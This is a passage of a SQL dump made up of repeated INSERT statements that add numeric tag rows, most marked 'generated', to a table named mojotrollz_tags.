2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148498, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148499, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148503, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148504, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148506, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148507, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148511, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148512, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148512, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148513, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148514, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148515, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148516, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148540, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148544, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148547, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148549, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148550, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148551, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148554, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148556, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148557, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148567, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148659, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148660, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148661, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148663, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148669, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148670, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148671, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148672, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148673, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148674, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148675, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148676, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148677, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148680, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148681, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148682, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148683, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148684, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148685, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148686, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148687, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148688, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148693, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148696, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148697, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148714, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148725, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148730, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148731, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148732, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148733, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148736, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148737, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148738, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148739, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148741, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148742, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148758, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148761, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148762, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148771, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148772, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148774, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148781, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148782, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148790, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148795, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148796, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148801, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148807, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148811, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148812, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148813, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148814, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148815, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148816, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148817, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148818, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148830, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148830, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148831, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148831, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148832, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148832, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148833, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148833, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148834, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148834, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148835, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148835, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148836, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148836, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148838, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148838, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148840, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148841, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148843, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148843, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148844, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148844, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148845, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148845, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148846, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148846, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148847, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148847, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148848, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148848, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148849, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148849, 2, 2, 1316, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148850, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148850, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148851, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148851, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148852, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148852, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148853, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148853, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148854, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148854, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148855, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148855, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148856, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148856, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148857, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148857, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148858, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148858, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148859, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148859, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148860, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148860, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148861, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148861, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148862, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148862, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148863, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148863, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148864, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148864, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148865, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148866, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148876, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148877, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148878, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148879, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148880, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148883, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148883, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148884, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148885, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148886, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148887, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148888, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148889, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148891, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148892, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148893, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148894, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148895, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148898, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148899, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148900, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148902, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148903, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148904, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148905, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148906, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148909, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148910, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148911, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148912, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148913, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148914, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148915, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148917, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148917, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148937, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148937, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148956, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148957, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148958, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148959, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148960, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148976, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148996, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148997, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148998, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148998, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149017, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149018, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149019, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149020, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149021, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149022, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149024, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149026, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149027, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149028, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149029, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149030, 